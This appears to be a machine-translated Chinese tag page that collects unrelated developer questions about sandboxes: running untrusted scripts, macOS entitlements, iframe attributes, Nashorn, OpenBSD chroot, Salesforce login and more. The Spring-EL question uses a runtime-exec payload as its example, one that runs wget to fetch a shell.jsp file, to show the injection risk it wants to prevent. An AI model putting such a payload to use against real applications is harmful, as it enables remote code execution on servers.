标签: sandbox

我有一个Web服务,用户上传在服务器上运行的python脚本.这些脚本处理在服务器上的文件,我希望他们能够看到仅在服务器的文件系统中某一层级(最好:关于这一点我复制我要处理的文件和脚本的临时文件夹).

服务器最终将是基于Linux的服务器,但如果在Windows上也可以使用解决方案,那么知道如何解决这个问题会很好.

我的目的是创建一个限制访问FS文件夹的用户 - 最终只包含脚本和文件的文件夹 - 并使用该用户启动python解释器.

有人可以给我一个更好的选择吗？因为只依靠这个让我觉得不安全,我想要一个真正的沙盒或虚拟FS功能,我可以安全地运行不受信任的代码.

只是想知道有没有办法创建一个临时沙箱环境来运行命令？

我的要求是我在 unix 中托管一个 Web 服务，并且需要执行一个命令行工具将输出返回到 Web 服务客户端。由于我将从客户端接收到的值传递给命令行工具，因此我想在沙盒环境中执行命令。

我做的一项常见任务是使用NSFileManager读取目录内容:contentsOfDirectoryAtPath但在Lion中启用沙盒这是不可能的.

我知道用户必须从NSOpenPanel中选择目录以使Sandbox满意(或放弃它)但是如何"通知"沙箱我必须从以前存储在某些配置文件中的路径读取目录而无需用户交互？

目前我已设置以下授权密钥

com.apple.security.files.user-selected.read-write
com.apple.security.documents.user-selected.read-write
com.apple.security.temporary-exception.files.absolute-path.read-write

我正在使用测试用户（在沙箱中）测试 IAP，我有一个实现 SKPaymentTransactionObserver 协议的类，当用户选择某个表视图单元格时，我启动付款：

SKPayment *payment = [SKPayment paymentWithProductIdentifier:productIdentifier];
[[SKPaymentQueue defaultQueue] addPayment:payment];

这只完成一次，我已经检查过：代码被调用一次。问题是“- (void) paymentQueue:(SKPaymentQueue *)queue UpdatedTransactions:(NSArray *)transactions”有时会被多次调用，我不明白为什么。这种情况并不总是发生，但它不应该发生。

有没有人在沙箱测试时遇到过这种行为（如果在真实场景中发生这种情况将是一个大问题）？

我刚刚创建了一个带有sandbox属性的iFrame .每当我试图打开一个链接与target="_blank"或target="_top"或当我尝试使用window.open()没有任何反应.

这是我的代码:

<iframe src="http://www.google.com/"
  sandbox="allow-top-navigation allow-same-origin allow-forms allow-scripts">

    Apparently your browser doesn't support iFrames!

</iframe>

我正在寻找沙盒 Java 8 的 Nashorn javascript 引擎。我已经发现了 --no-java 标志，它有帮助，但我还发现以下链接说需要“在启用 SecurityManager 的情况下运行”：http : //mail.openjdk.java.net/ pipermail/nashorn-dev/2013-September/002010.html

我还没有找到说明如何使用 Nashorn 完成此操作的文档，那么如何安全地完成此操作？

我最近开始使用 OpenBSD。我想创建简单的即发即弃容器/VM 或其他东西（它应该用作沙箱）。

用户可以上传他的源代码（C++/Java/Perl），它会在服务器（OpenBSD）上编译，如果编译成功，它应该执行这个文件，然后将结果返回到网页。

我如何在 OpenBSD 中提供这个？

另外，我应该使用 chroot，因为 'jail' 将在 6.0 中删除吗？或者还有其他可能在 OpenBSD 中创建“沙箱”吗？

我正在使用 Spring-EL 创建动态 csv 字段到类字段映射，用于不同的 Spring-Batch 导入作业。（不同的输入文件，相同的输出类）。这工作得很好，但想法是用户必须能够创建这样的映射配置。

问题在于 Spring-EL 表达式不是在某种沙箱内执行的，因此很容易注入恶意代码。例如：

name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")

我的问题是，如何在某种沙箱中运行 Spring-EL 或限制仅访问一组特定的方法/类？我找不到与该主题相关的任何内容。也许 Spring-EL 不是这项工作的正确选择。

我试图实现的目标的示例：

name: column[0]
category: concat(' ', column[18], column[19])
age: split(column[3], '/', 0)

我正在使用 python3.7.2 模块simple-salesforce==0.74.2，但在尝试建立与我的 salesforce 沙箱的连接时遇到问题。我可以使用相同的凭据登录到 salesforce 生产环境，如下所示：

from simple_salesforce import Salesforce
sf = Salesforce(username='user@domain.com', password='pswd', security_token='mytoken')

好吧，酷。现在我尝试使用以下命令登录我的沙箱：

sf = Salesforce(username='user@domain.com.sandbox_name', password='pswd', security_token='mytoken', sandbox=True)

我收到错误：

simple_salesforce.exceptions.SalesforceAuthenticationFailed：INVALID_LOGIN：用户名、密码、安全令牌无效；或用户被锁定。

所以我尝试使用不同的方法登录：

sf = Salesforce(username='user@domain.com.sandbox_name', password='pswd', security_token='mytoken', domain='sandbox_name')

这给出了一个不同的错误：

requests.exceptions.ConnectionError: HTTPSConnectionPool(host='sandbox_name.salesforce.com', port=443): 超过最大重试次数，url: /services/Soap/u/38.0 (由 NewConnectionError(': 无法建立新连接引起) : [Errno 8] 节点名称或服务名称已提供，或未知'))

我正在使用名为 的开发人员沙箱sandbox_name，遵循销售人员的指示。有人可以对我做错的事情提出一些建议吗？

目前我在我的申请中有一个概念问题。

用户应该能够在我的 react/redux 应用程序中创建一个 Javascript 类，并且我的应用程序应该能够执行编写的 javascript 代码。

例如，用户 A 写道：

class PredefinedClassName {
  constructor(a) {
    this.a = a;
  }

  getSomething(parameterFromOutside) {
    return this.a * parameterFromOutside;
  }
}

然后将此类保存为某个数据库中的字符串（重要）。

接下来我想加载这个类（再次作为字符串）并执行以下操作：

1. 创建包含在字符串中的此类的实例......（如何？）
2. 在实例上调用“getSomething”方法并将我自己的参数传递给该方法（如何？）

由于这是一个非常罕见的用例，因此关于库的文献很少，几乎没有。

网站说明：最重要的是，我还应该检查语法和运行时错误，但我认为这是下一步，所以首先我想解决基本部分。

你对如何解决这个概念问题有什么想法吗？

谢谢和问候！